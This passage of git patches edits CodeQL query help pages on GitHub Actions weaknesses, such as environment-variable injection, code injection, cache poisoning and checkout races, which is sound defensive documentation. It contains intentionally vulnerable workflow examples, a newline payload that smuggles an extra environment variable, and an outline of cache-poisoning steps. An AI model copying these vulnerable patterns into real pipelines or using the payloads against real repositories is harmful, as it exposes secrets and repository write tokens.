sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples 
diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 88cc06de90a4..ae9afbb76f45 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. +Do not allow untrusted data to influence the system PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. ## Examples From a282818272a8312dbe8a97725c5c04dd5f4f46d0 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:52:06 +0000 Subject: [PATCH 476/707] grammar --- .../CWE-077/EnvPathInjectionCritical.md | 2 +- .../CWE-077/EnvPathInjectionMedium.md | 2 +- .../CWE-077/EnvVarInjectionCritical.md | 58 +++++++++---------- .../Security/CWE-077/EnvVarInjectionMedium.md | 58 +++++++++---------- 4 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index ae9afbb76f45..436cf6859964 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index ae9afbb76f45..436cf6859964 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -2,7 +2,7 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g.: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index a16b41e3970d..cc35402b804d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} 
@@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. 
**Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | 
@@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index a16b41e3970d..cc35402b804d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,9 +2,9 @@ ## Description -GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define environment variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: -This file should lines in the `KEY=VALUE` format: +This file contains lines in the `KEY=VALUE` format: ```bash steps: @@ -14,7 +14,7 @@ steps: echo "action_state=yellow" >> "$GITHUB_ENV" ``` -It is also possible to define a multiline variables by using the following format: +It is also possible to define multiline variables by using the [following construct](https://en.wikipedia.org/wiki/Here_document): ``` KEY<<{delimiter} 
@@ -35,40 +35,40 @@ steps: } >> "$GITHUB_ENV" ``` -If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. +If an attacker can control the values assigned to environment variables and there is no sanitization in place, the attacker will be able to inject additional variables by injecting new lines or `{delimiters}`. ## Recommendations -1. **Do Not Allow Untrusted Data to Influence Environment Variables**: +1. **Do not allow untrusted data to influence environment variables**: -- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. -- Validate and sanitize all inputs before using them in environment settings. + - Avoid using untrusted data sources (e.g., artifact content) to define environment variables. + - Validate and sanitize all inputs before using them in environment settings. -2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: +2. **Do not allow new lines when defining single line environment variables**: -- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + - `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` -3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: +3. 
**Use unique identifiers when defining multi line environment variables**: -```bash -steps: - - name: Set the value in bash - id: step_one - run: | - # Generate a UUID - UUID=$(uuidgen) - { - echo "JSON_RESPONSE<> "$GITHUB_ENV" -``` + ```bash + steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" + ``` ## Examples ### Example of Vulnerability -Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: +Consider the following basic setup where an environment variable `MYVAR` is set and used in subsequent steps: ```yaml steps: @@ -78,17 +78,17 @@ steps: BODY: ${{ github.event.comment.body }} run: | REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') - echo "BODY=$REPLACED" >> "$GITHUB_ENV" + echo "MYVAR=$REPLACED" >> "$GITHUB_ENV" ``` -If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, the attacker can potentially inject new environment variables. For example, they could write an issue comment like: -``` +```text FOO NEW_ENV_VAR=MALICIOUS_VALUE ``` -Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: +Likewise, if the attacker controls a file in the GitHub Actions Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact) and the contents of that file are assigned to an environment variable such as: ```bash - run: | 
@@ -109,7 +109,7 @@ An attacker could craft a malicious artifact that writes dangerous environment v ### Exploitation -An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. +An attacker is be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. ## References From e83841bba9a3be69d0c14aa4f6e9fb59ad65dae6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Mon, 12 Aug 2024 09:29:26 +0000 Subject: [PATCH 477/707] fixes --- .../CWE-088/ArgumentInjectionCritical.md | 2 +- .../CWE-088/ArgumentInjectionMedium.md | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 4 +- .../Security/CWE-094/CodeInjectionMedium.md | 4 +- .../CWE-275/MissingActionsPermissions.md | 5 +- .../Security/CWE-285/ImproperAccessControl.md | 11 +-- .../CWE-349/CachePoisoningViaCodeInjection.md | 20 +++--- .../CWE-349/CachePoisoningViaDirectCache.md | 53 ++++++++++---- .../CachePoisoningViaPoisonableStep.md | 22 +++--- .../UntrustedCheckoutTOCTOUCritical.md | 72 +------------------ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 72 +------------------ .../CWE-571/ExpressionIsAlwaysTrue.md | 58 +++++++-------- .../CWE-829/ArtifactPoisoningCritical.md | 6 +- .../CWE-829/ArtifactPoisoningMedium.md | 6 +- .../CWE-829/UntrustedCheckoutCritical.md | 6 +- .../Security/CWE-829/UntrustedCheckoutHigh.md | 6 +- .../CWE-829/UntrustedCheckoutMedium.md | 6 +- 17 files changed, 126 insertions(+), 229 deletions(-) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md index 00dc3bad472b..4957297be92a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md 
@@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md index 00dc3bad472b..4957297be92a 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -4,7 +4,7 @@ Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. -Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing the attacker to make changes to the repository. ## Recommendations diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index cc85f68fb0d2..f2e494468112 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md 
@@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations @@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md index cc85f68fb0d2..f2e494468112 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.md +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md @@ -4,7 +4,7 @@ Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. -Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token may have write access to the repository, allowing an attacker to make changes to the repository. ## Recommendations 
@@ -16,7 +16,7 @@ It is also recommended to limit the permissions of any tokens used by a workflow ### Incorrect Usage -The following example lets a user inject an arbitrary shell command: +The following example lets attackers inject an arbitrary shell command: ```yaml on: issue_comment diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.md b/ql/src/Security/CWE-275/MissingActionsPermissions.md index 31ddab5329d3..9385759dae95 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.md +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.md 
@@ -2,12 +2,11 @@ ## Description -A GitHub Actions job or workflow hasn't set explicit permissions to restrict privileges to the workflow job. -A workflow job by default without the `permissions` key or a root workflow `permissions` will run with the default permissions defined at the repository level. For organizations created before February 2023, including many significant OSS projects and corporations, the default permissions grant read-write access to repositories, and new repositories inherit these old, insecure permissions. +If a GitHub Actions job or workflow has no explicit permissions set, then the repository permissions are used. Repositories created under organizations inherit the organization permissions. The organizations or repositories created before February 2023 have the default permissions set to read-write. Often these permissions do not adhere to the principle of least privilege and can be reduced to read-only, leaving the `write` permission only to a specific types as `issues: write` or `pull-requests: write`. ## Recommendations -Add the `permissions` key to the job or workflow (applied to all jobs) and set the permissions to the least privilege required to complete the task: +Add the `permissions` key to the job or the root of workflow (in this case it is applied to all jobs in the workflow that do not have their own `permissions` key) and assign the least privileges required to complete the task: ```yaml name: "My workflow" diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.md b/ql/src/Security/CWE-285/ImproperAccessControl.md index c517ff98e585..594f381d8ce0 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.md +++ b/ql/src/Security/CWE-285/ImproperAccessControl.md 
@@ -2,17 +2,20 @@ ## Description -An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed. +Sometimes labels are used to approve GitHub Actions. An authorization check may not be properly implemented, allowing an attacker to mutate the code after it has been reviewed and approved by label. ## Recommendations -When using Label gates, make sure that the code cannot be modified after it has been reviewed and the label has been set. +When using labels, make sure that the code cannot be modified after it has been reviewed and the label has been set. ## Examples ### Incorrect Usage -The following example shows a job that requires the label `safe to test` to be set before running untrusted code. However, the workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. +The following example shows a job that requires the label `safe to test` to be set before running untrusted code. There are two problems with the code: + +1. The workflow gets triggered on `synchronize` activity type and, therefore, it will get triggered every time there is a change in the Pull Request. An attacker can modify the code of the Pull Request after the code has been reviewed and the label has been set. The workflow will be triggered every time a new change is added to the Pull Request. +2. The workflow uses `ref: ${{ github.event.pull_request.head.ref }}` for checkout, which is a branch name of the Pull Request. There is a window of opportunity for the attacker to modify their branch after the Pull Request is labeled, but before the workflow starts and runs the checkout. ```yaml on: 
@@ -33,7 +36,7 @@ jobs: ### Correct Usage -Make sure that the workflow only gets triggered when the label is set and use an inmutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. +Make sure that the workflow only gets triggered when the label is set and use an immutable commit (`github.event.pull_request.head.sha`) instead of a mutable reference. ```yaml on: diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md index fb927f97c68b..667c41dc153e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md @@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md index c3c5970c37f5..c12fb7998929 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md 
@@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -69,13 +69,12 @@ jobs: ### Correct Usage -The following workflow is not checking out untrusted files and, therefore, is caching trusted files only. +The following workflow checking out untrusted files, but the cache is scoped to the Pull Request. ```yaml name: Secure Workflow on: - issue_comment: - types: [created] + pull_request: jobs: pr-comment: 
@@ -94,6 +93,34 @@ jobs: restore-keys: ${{ runner.os }}-pip- ``` +Note, that the example above doesn't allow using secrets if the Pull Request originates from a fork. In case secrets are needed, `pull_request_target` with labels as `safe to test` can be used, but the code in Pull Request must be manually reviewed before applying the label. + +```yaml +name: Secure Workflow +on: + pull_request_target: + types: [labeled] + +jobs: + pr-comment: + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.sha}} + - name: Set up Python 3.10 + uses: actions/setup-python@v5 + - name: Cache pip dependencies + uses: actions/cache@v4 + id: cache-pip + with: + path: ~/.cache/pip + key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} + restore-keys: ${{ runner.os }}-pip- +``` + ## References - [The Monsters in Your Build Cache – GitHub Actions Cache Poisoning](https://adnanthekhan.com/2024/05/06/the-monsters-in-your-build-cache-github-actions-cache-poisoning/) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md index 70df52dc4635..c777e1980393 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md 
@@ -2,14 +2,14 @@ ## Description -GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache, potentially leading to code execution in privileged workflows. +GitHub Actions cache poisoning is a technique that allows an attacker to inject malicious content into the Action's cache from unprivileged workflow, potentially leading to code execution in privileged workflows. An attacker with the ability to run code in the context of the default branch (e.g. through Code Injection or Execution of Untrusted Code) can exploit this to: -1. Steal the cache access token and URL -2. Fill the cache to trigger eviction of legitimate entries -3. Poison cache entries with malicious payloads -4. Achieve code execution in privileged workflows that restore the poisoned cache +1. Steal the cache access token and URL. +2. Overflow the cache to trigger eviction of legitimate entries. +3. Poison cache entries with malicious payloads. +4. Achieve code execution in privileged workflows that restore the poisoned cache. This allows lateral movement from low-privileged to high-privileged workflows within a repository. 
@@ -27,11 +27,11 @@ Due to the above design, if something is cached in the context of the default br 1. Avoid using caching in workflows that handle sensitive operations like releases. 2. If caching must be used: - - Validate restored cache contents before use - - Use short-lived, workflow-specific cache keys - - Clear caches regularly -3. Implement strict isolation between untrusted and privileged workflow execution: -4. Never run untrusted code in the context of the default branch + - Validate restored cache contents before use. + - Use short-lived, workflow-specific cache keys. + - Clear caches regularly. +3. Implement strict isolation between untrusted and privileged workflow execution. +4. Never run untrusted code in the context of the default branch. 5. Sign the cache value cryptographically and verify the signature before usage. ## Examples @@ -59,7 +59,7 @@ jobs: ### Correct Usage -The following workflow runs untrusted code in a non-privileged job and in the context of a non-default branch. +The following workflow runs untrusted code in a non-privileged job and the cache is scoped to the Pull Request branch. ```yaml name: Secure Workflow diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md index 105fe6ecd69e..4e9b389834e8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description 
@@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR branch - uses: xt0rted/pull-request-comment-branch@v2 - id: comment-branch - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.comment-branch.outputs.head_ref }} - - run: ./cmd -``` - -### Correct Usage (Issue Ops) - -In the following example, the workflow checks if the latest commit of the Pull Request head was commited **before** the comment on the Pull Request, therefore ensuring that it was not mutated after the check. 
- -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - permissions: "write-all" - runs-on: [ubuntu-latest] - steps: - - name: Get PR Info - id: pr - env: - PR_NUMBER: ${{ github.event.issue.number }} - GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - GH_REPO: ${{ github.repository }} - COMMENT_AT: ${{ github.event.comment.created_at }} - run: | - pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" - head_sha="$(echo "$pr" | jq -r .head.sha)" - pushed_at="$(echo "$pr" | jq -r .pushed_at)" - if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then - echo "Updating is not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" - exit 1 - fi - echo "head_sha=$head_sha" >> $GITHUB_OUTPUT - - name: Checkout PR branch - uses: actions/checkout@v3 - with: - ref: ${{ steps.pr.outputs.head_sha }} - - run: ./cmd -``` - ### Incorrect Usage (Deployment Environment Approval) The following workflow uses a Deployment Environment which may be configured to require an approval. However, it check outs the code pointed to by the Pull Request branch reference. At attacker could submit legitimate code for review and then change it once it gets approved. @@ -102,7 +36,7 @@ jobs: ### Correct Usage (Deployment Environment Approval) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yml on: 
@@ -144,7 +78,7 @@ jobs: ### Correct Usage (Label Gates) -Use inmutable references (Commit SHA) to make sure that the reviewd code does not change between the check and the use. +Use immutable references (Commit SHA) to make sure that the reviewed code does not change between the check and the use. ```yaml on: diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md index 105fe6ecd69e..4e9b389834e8 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md @@ -1,4 +1,4 @@ -# Untrusted Checkout TOCTOU +# Untrusted Checkout TOCTOU (Time-of-check to time-of-use) ## Description 
@@ -8,77 +8,11 @@ Untrusted Checkout is protected by a security check but the checked-out branch c Verify that the code has not been modified after the security check. This may be achieved differently depending on the type of check: -- Issue Ops: Verify that Commit containing the code to be executed was commited **before** then date the of the comment. - Deployment Environment Approval: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. - Label Gates: Make sure to use a non-mutable reference to the code to be executed. For example use a `sha` instead of a `ref`. ## Examples -### Incorrect Usage (Issue Ops) - -The following workflow runs untrusted code after either a member or admin of the repository comments on a Pull Request with the text `/run-tests`. Although it may seem secure, the workflow is checking out a mutable reference (`${{ steps.comment-branch.outputs.head_ref }}`) and therefore the code can be mutated between the time of check (TOC) and the time of use (TOU). - -```yaml -name: Comment Triggered Test -on: - issue_comment: - types: [created] -jobs: - benchmark: - name: Integration Tests - if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} - 